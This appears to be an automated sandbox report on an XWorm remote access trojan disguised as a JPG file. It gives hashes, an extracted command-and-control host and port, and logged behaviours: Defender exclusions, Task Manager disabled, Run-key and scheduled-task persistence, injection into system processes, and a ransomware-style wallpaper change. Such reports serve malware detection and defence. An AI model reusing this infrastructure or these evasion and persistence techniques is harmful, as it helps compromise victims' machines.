xworm | de395b853803c92eba20833640fab2d399d7c305666c49944d08c148a97779d9

Analysis

max time kernel
149s
max time network
151s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags

arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
submitted
15-06-2024 07:07

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

download (1).jpg
Size

19KB
MD5

11c853fc26560b1eda4cdcfd13c3498e
SHA1

a468d5be722b223abb4181ead392987b65c0700e
SHA256

de395b853803c92eba20833640fab2d399d7c305666c49944d08c148a97779d9
SHA512

302127d59bf0a9cf79f1152abbff313f1e60260117fc5d114fe4ad198cd3d5883158d453d8cc3b3718f016d8d279e9bbae45c7a99938aa48f9535bcef77d6dd1
SSDEEP

384:54VrXGg9+ViIcgmcOGzjqhr/IBUmLsk2t3/RZIYQIs6N2Us4PQY7sNrUSqhxrto5:5cGgRIJmszjqI72IjUBsN8jl5Q

Score

10^/10

xworm evasion execution persistence ransomware rat trojan upx

Malware Config

Extracted

Family

xworm

127.0.0.1:13576

edition-eat.gl.at.ply.gg:13576

Attributes

Install_directory
%AppData%
install_file
x4svchost.exe

Signatures

Detect Xworm Payload 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\x4.exe	family_xworm
behavioral1/memory/2272-62-0x00000000006F0000-0x0000000000706000-memory.dmp	family_xworm

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

Processes:

powershell.EXE

description pid process target process

PID 2484 created 580 2484 powershell.EXE winlogon.exe
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Blocklisted process makes network request 4 IoCs

Processes:

powershell.exe

flow pid process

4 908 powershell.exe
5 908 powershell.exe
7 908 powershell.exe
10 908 powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

pid process

1352 powershell.exe
3064 powershell.exe
2312 powershell.exe
4928 powershell.exe
Disables Task Manager via registry modification
evasion
Downloads MZ/PE file

description	pid	process	target process
PID 2484 created 580	2484	powershell.EXE	winlogon.exe

flow	pid	process
4	908	powershell.exe
5	908	powershell.exe
7	908	powershell.exe
10	908	powershell.exe

pid	process
1352	powershell.exe
3064	powershell.exe
2312	powershell.exe
4928	powershell.exe

Drops startup file 2 IoCs

Processes:

x4.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x4svchost.lnk	x4.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x4svchost.lnk	x4.exe

Executes dropped EXE 5 IoCs

Processes:

svchost32.exex4.exex4Shellcode.exex4svchost.exevwnhtd.exe

pid process

4600 svchost32.exe
2272 x4.exe
2864 x4Shellcode.exe
4248 x4svchost.exe
3288 vwnhtd.exe

pid	process
4600	svchost32.exe
2272	x4.exe
2864	x4Shellcode.exe
4248	x4svchost.exe
3288	vwnhtd.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\vwnhtd.exe	upx
behavioral1/memory/3288-1090-0x0000000000400000-0x000000000067C000-memory.dmp	upx

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

x4.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Windows\CurrentVersion\Run\x4svchost = "C:\\Users\\Admin\\AppData\\Roaming\\x4svchost.exe"	x4.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

9 raw.githubusercontent.com
10 raw.githubusercontent.com

flow	ioc
9	raw.githubusercontent.com
10	raw.githubusercontent.com

Drops file in System32 directory 8 IoCs

Processes:

OfficeClickToRun.exesvchost.exepowershell.EXEsvchost.exe

description	ioc	process
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187	OfficeClickToRun.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187	OfficeClickToRun.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log	powershell.EXE
File opened for modification	C:\Windows\System32\Tasks\x4svchost	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml	OfficeClickToRun.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157	OfficeClickToRun.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Control Panel\Desktop\Wallpaper = "c:\\skulls.bmp"	reg.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.EXE

description pid process target process

PID 2484 set thread context of 396 2484 powershell.EXE dllhost.exe
Drops file in Windows directory 1 IoCs

Processes:

powershell.exe

description ioc process

File created C:\Windows\svchost32.exe powershell.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

description	pid	process	target process
PID 2484 set thread context of 396	2484	powershell.EXE	dllhost.exe

description	ioc	process
File created	C:\Windows\svchost32.exe	powershell.exe

Checks processor information in registry 2 TTPs 6 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

wmiprvse.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key security queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	wmiprvse.exe

Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exe

pid process

3304 schtasks.exe

pid	process
3304	schtasks.exe

Modifies Internet Explorer settings 1 TTPs 2 IoCs

adware spyware

Modify Registry

T1112

Processes:

Explorer.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	Explorer.EXE

Modifies data under HKEY_USERS 57 IoCs

Processes:

powershell.EXEOfficeClickToRun.exesvchost.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0	OfficeClickToRun.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1718435320"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.EXE
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={5C975315-6E6E-4678-90C6-041CE3BF21B9}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&"	OfficeClickToRun.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata	OfficeClickToRun.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Sat, 15 Jun 2024 07:08:41 GMT"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.EXE

Modifies registry class 1 IoCs

Processes:

Explorer.EXE

description ioc process

Key created \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings Explorer.EXE
Modifies registry key 1 TTPs 5 IoCs

Modify Registry
T1112

Processes:

reg.exereg.exereg.exereg.exereg.exe

pid process

364 reg.exe
2984 reg.exe
1748 reg.exe
1548 reg.exe
4568 reg.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings	Explorer.EXE

pid	process
364	reg.exe
2984	reg.exe
1748	reg.exe
1548	reg.exe
4568	reg.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.EXEdllhost.exepowershell.exe

pid	process
908	powershell.exe
908	powershell.exe
908	powershell.exe
2484	powershell.EXE
2484	powershell.EXE
2484	powershell.EXE
2484	powershell.EXE
396	dllhost.exe
396	dllhost.exe
396	dllhost.exe
396	dllhost.exe
396	dllhost.exe
396	dllhost.exe
396	dllhost.exe
396	dllhost.exe
396	dllhost.exe
396	dllhost.exe
396	dllhost.exe
396	dllhost.exe
396	dllhost.exe
396	dllhost.exe
396	dllhost.exe
396	dllhost.exe
396	dllhost.exe
396	dllhost.exe
396	dllhost.exe
396	dllhost.exe
396	dllhost.exe
396	dllhost.exe
396	dllhost.exe
396	dllhost.exe
396	dllhost.exe
396	dllhost.exe
396	dllhost.exe
396	dllhost.exe
396	dllhost.exe
396	dllhost.exe
396	dllhost.exe
396	dllhost.exe
396	dllhost.exe
396	dllhost.exe
1352	powershell.exe
1352	powershell.exe
396	dllhost.exe
396	dllhost.exe
1352	powershell.exe
396	dllhost.exe
396	dllhost.exe
396	dllhost.exe
396	dllhost.exe
396	dllhost.exe
396	dllhost.exe
396	dllhost.exe
396	dllhost.exe
1352	powershell.exe
396	dllhost.exe
396	dllhost.exe
396	dllhost.exe
396	dllhost.exe
396	dllhost.exe
396	dllhost.exe
396	dllhost.exe
396	dllhost.exe
1352	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

Explorer.EXE

pid process

3308 Explorer.EXE

pid	process
3308	Explorer.EXE

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exex4.exepowershell.EXEdllhost.exepowershell.exesvchost.exe

description	pid	process
Token: SeDebugPrivilege	908	powershell.exe
Token: SeDebugPrivilege	2272	x4.exe
Token: SeDebugPrivilege	2484	powershell.EXE
Token: SeDebugPrivilege	2484	powershell.EXE
Token: SeDebugPrivilege	396	dllhost.exe
Token: SeDebugPrivilege	1352	powershell.exe
Token: SeIncreaseQuotaPrivilege	1352	powershell.exe
Token: SeSecurityPrivilege	1352	powershell.exe
Token: SeTakeOwnershipPrivilege	1352	powershell.exe
Token: SeLoadDriverPrivilege	1352	powershell.exe
Token: SeSystemProfilePrivilege	1352	powershell.exe
Token: SeSystemtimePrivilege	1352	powershell.exe
Token: SeProfSingleProcessPrivilege	1352	powershell.exe
Token: SeIncBasePriorityPrivilege	1352	powershell.exe
Token: SeCreatePagefilePrivilege	1352	powershell.exe
Token: SeBackupPrivilege	1352	powershell.exe
Token: SeRestorePrivilege	1352	powershell.exe
Token: SeShutdownPrivilege	1352	powershell.exe
Token: SeDebugPrivilege	1352	powershell.exe
Token: SeSystemEnvironmentPrivilege	1352	powershell.exe
Token: SeRemoteShutdownPrivilege	1352	powershell.exe
Token: SeUndockPrivilege	1352	powershell.exe
Token: SeManageVolumePrivilege	1352	powershell.exe
Token: 33	1352	powershell.exe
Token: 34	1352	powershell.exe
Token: 35	1352	powershell.exe
Token: 36	1352	powershell.exe
Token: SeAssignPrimaryTokenPrivilege	2448	svchost.exe
Token: SeIncreaseQuotaPrivilege	2448	svchost.exe
Token: SeSecurityPrivilege	2448	svchost.exe
Token: SeTakeOwnershipPrivilege	2448	svchost.exe
Token: SeLoadDriverPrivilege	2448	svchost.exe
Token: SeSystemtimePrivilege	2448	svchost.exe
Token: SeBackupPrivilege	2448	svchost.exe
Token: SeRestorePrivilege	2448	svchost.exe
Token: SeShutdownPrivilege	2448	svchost.exe
Token: SeSystemEnvironmentPrivilege	2448	svchost.exe
Token: SeUndockPrivilege	2448	svchost.exe
Token: SeManageVolumePrivilege	2448	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2448	svchost.exe
Token: SeIncreaseQuotaPrivilege	2448	svchost.exe
Token: SeSecurityPrivilege	2448	svchost.exe
Token: SeTakeOwnershipPrivilege	2448	svchost.exe
Token: SeLoadDriverPrivilege	2448	svchost.exe
Token: SeSystemtimePrivilege	2448	svchost.exe
Token: SeBackupPrivilege	2448	svchost.exe
Token: SeRestorePrivilege	2448	svchost.exe
Token: SeShutdownPrivilege	2448	svchost.exe
Token: SeSystemEnvironmentPrivilege	2448	svchost.exe
Token: SeUndockPrivilege	2448	svchost.exe
Token: SeManageVolumePrivilege	2448	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2448	svchost.exe
Token: SeIncreaseQuotaPrivilege	2448	svchost.exe
Token: SeSecurityPrivilege	2448	svchost.exe
Token: SeTakeOwnershipPrivilege	2448	svchost.exe
Token: SeLoadDriverPrivilege	2448	svchost.exe
Token: SeSystemtimePrivilege	2448	svchost.exe
Token: SeBackupPrivilege	2448	svchost.exe
Token: SeRestorePrivilege	2448	svchost.exe
Token: SeShutdownPrivilege	2448	svchost.exe
Token: SeSystemEnvironmentPrivilege	2448	svchost.exe
Token: SeUndockPrivilege	2448	svchost.exe
Token: SeManageVolumePrivilege	2448	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2448	svchost.exe

Suspicious use of FindShellTrayWindow 34 IoCs

Processes:

dwm.exeConhost.exeExplorer.EXE

pid	process
988	dwm.exe
988	dwm.exe
988	dwm.exe
988	dwm.exe
988	dwm.exe
988	dwm.exe
988	dwm.exe
988	dwm.exe
988	dwm.exe
988	dwm.exe
1796	Conhost.exe
988	dwm.exe
988	dwm.exe
988	dwm.exe
988	dwm.exe
988	dwm.exe
988	dwm.exe
988	dwm.exe
988	dwm.exe
988	dwm.exe
988	dwm.exe
988	dwm.exe
988	dwm.exe
988	dwm.exe
988	dwm.exe
3308	Explorer.EXE
3308	Explorer.EXE
988	dwm.exe
988	dwm.exe
3308	Explorer.EXE
3308	Explorer.EXE
3308	Explorer.EXE
988	dwm.exe
988	dwm.exe

Suspicious use of SendNotifyMessage 2 IoCs

Processes:

Explorer.EXE

pid process

3308 Explorer.EXE
3308 Explorer.EXE

pid	process
3308	Explorer.EXE
3308	Explorer.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

cmd.exepowershell.exesvchost32.exepowershell.EXEdllhost.exe

description	pid	process	target process
PID 1260 wrote to memory of 908	1260	cmd.exe	powershell.exe
PID 1260 wrote to memory of 908	1260	cmd.exe	powershell.exe
PID 908 wrote to memory of 4600	908	powershell.exe	svchost32.exe
PID 908 wrote to memory of 4600	908	powershell.exe	svchost32.exe
PID 4600 wrote to memory of 2272	4600	svchost32.exe	x4.exe
PID 4600 wrote to memory of 2272	4600	svchost32.exe	x4.exe
PID 4600 wrote to memory of 2864	4600	svchost32.exe	x4Shellcode.exe
PID 4600 wrote to memory of 2864	4600	svchost32.exe	x4Shellcode.exe
PID 4600 wrote to memory of 2864	4600	svchost32.exe	x4Shellcode.exe
PID 2484 wrote to memory of 396	2484	powershell.EXE	dllhost.exe
PID 2484 wrote to memory of 396	2484	powershell.EXE	dllhost.exe
PID 2484 wrote to memory of 396	2484	powershell.EXE	dllhost.exe
PID 2484 wrote to memory of 396	2484	powershell.EXE	dllhost.exe
PID 2484 wrote to memory of 396	2484	powershell.EXE	dllhost.exe
PID 2484 wrote to memory of 396	2484	powershell.EXE	dllhost.exe
PID 2484 wrote to memory of 396	2484	powershell.EXE	dllhost.exe
PID 2484 wrote to memory of 396	2484	powershell.EXE	dllhost.exe
PID 396 wrote to memory of 580	396	dllhost.exe	winlogon.exe
PID 396 wrote to memory of 632	396	dllhost.exe	lsass.exe
PID 396 wrote to memory of 728	396	dllhost.exe	svchost.exe
PID 396 wrote to memory of 892	396	dllhost.exe	svchost.exe
PID 396 wrote to memory of 988	396	dllhost.exe	dwm.exe
PID 396 wrote to memory of 356	396	dllhost.exe	svchost.exe
PID 396 wrote to memory of 500	396	dllhost.exe	svchost.exe
PID 396 wrote to memory of 888	396	dllhost.exe	svchost.exe
PID 396 wrote to memory of 1056	396	dllhost.exe	svchost.exe
PID 396 wrote to memory of 1064	396	dllhost.exe	svchost.exe
PID 396 wrote to memory of 1148	396	dllhost.exe	svchost.exe
PID 396 wrote to memory of 1240	396	dllhost.exe	svchost.exe
PID 396 wrote to memory of 1280	396	dllhost.exe	svchost.exe
PID 396 wrote to memory of 1308	396	dllhost.exe	svchost.exe
PID 396 wrote to memory of 1320	396	dllhost.exe	svchost.exe
PID 396 wrote to memory of 1404	396	dllhost.exe	svchost.exe
PID 396 wrote to memory of 1476	396	dllhost.exe	svchost.exe
PID 396 wrote to memory of 1532	396	dllhost.exe	svchost.exe
PID 396 wrote to memory of 1552	396	dllhost.exe	svchost.exe
PID 396 wrote to memory of 1572	396	dllhost.exe	svchost.exe
PID 396 wrote to memory of 1648	396	dllhost.exe	svchost.exe
PID 396 wrote to memory of 1664	396	dllhost.exe	svchost.exe
PID 396 wrote to memory of 1772	396	dllhost.exe	svchost.exe
PID 396 wrote to memory of 1780	396	dllhost.exe	svchost.exe
PID 396 wrote to memory of 1852	396	dllhost.exe	svchost.exe
PID 396 wrote to memory of 1960	396	dllhost.exe	spoolsv.exe
PID 396 wrote to memory of 620	396	dllhost.exe	svchost.exe
PID 396 wrote to memory of 1696	396	dllhost.exe	svchost.exe
PID 396 wrote to memory of 2192	396	dllhost.exe	svchost.exe
PID 396 wrote to memory of 2232	396	dllhost.exe	svchost.exe
PID 396 wrote to memory of 2240	396	dllhost.exe	svchost.exe
PID 396 wrote to memory of 2276	396	dllhost.exe	sysmon.exe
PID 396 wrote to memory of 2284	396	dllhost.exe	svchost.exe
PID 396 wrote to memory of 2332	396	dllhost.exe	svchost.exe
PID 396 wrote to memory of 2436	396	dllhost.exe	svchost.exe
PID 396 wrote to memory of 2448	396	dllhost.exe	svchost.exe
PID 396 wrote to memory of 2460	396	dllhost.exe	svchost.exe
PID 396 wrote to memory of 2780	396	dllhost.exe	svchost.exe
PID 396 wrote to memory of 2960	396	dllhost.exe	sihost.exe
PID 396 wrote to memory of 2968	396	dllhost.exe	svchost.exe
PID 396 wrote to memory of 3020	396	dllhost.exe	unsecapp.exe
PID 396 wrote to memory of 1604	396	dllhost.exe	taskhostw.exe
PID 396 wrote to memory of 3164	396	dllhost.exe	svchost.exe
PID 396 wrote to memory of 3308	396	dllhost.exe	Explorer.EXE
PID 396 wrote to memory of 3856	396	dllhost.exe	RuntimeBroker.exe
PID 396 wrote to memory of 4068	396	dllhost.exe	DllHost.exe
PID 396 wrote to memory of 4736	396	dllhost.exe	svchost.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:580

C:\Windows\system32\dwm.exe
"dwm.exe"
2⤵
- Suspicious use of FindShellTrayWindow
PID:988

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{609d3d79-c16f-4b71-88b8-991da2362652}
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:396

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:632

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay
1⤵
PID:728

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s LSM
1⤵
PID:892

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts
1⤵
PID:356

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
1⤵
PID:500

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog
1⤵
PID:888

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService
1⤵
PID:1056

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Schedule
1⤵
- Drops file in System32 directory
PID:1064

c:\windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
2⤵
PID:1604

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
